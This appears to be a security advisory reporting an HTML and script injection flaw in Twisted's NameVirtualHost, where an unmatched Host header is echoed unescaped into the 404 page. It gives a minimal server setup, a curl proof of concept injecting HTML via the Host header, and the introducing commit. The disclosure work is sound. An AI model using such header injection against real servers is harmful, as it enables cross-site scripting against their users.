Twisted vulnerable to NameVirtualHost Host header injection

When the host header does not match a configured host, twisted.web.vhost.NameVirtualHost will return a NoResource resource which renders the Host header unescaped into the 404 response allowing HTML and script injection.

Example configuration:

from twisted.web.server import Site
from twisted.web.vhost import NameVirtualHost
from twisted.internet import reactor

resource = NameVirtualHost()
site = Site(resource)
reactor.listenTCP(8080, site)
reactor.run()

Output:

❯ curl -H"Host:<h1>HELLO THERE</h1>" http://localhost:8080/

&lt;html&gt;
  &lt;head&gt;&lt;title&gt;404 - No Such Resource&lt;/title&gt;&lt;/head&gt;
  &lt;body&gt;
    <h1>No Such Resource</h1>
    <p>host b'<h1>hello there</h1>' not in vhost map</p>
  &lt;/body&gt;
&lt;/html&gt;

This vulnerability was introduced in f49041bb67792506d85aeda9cf6157e92f8048f4 and first appeared in the 0.9.4 release.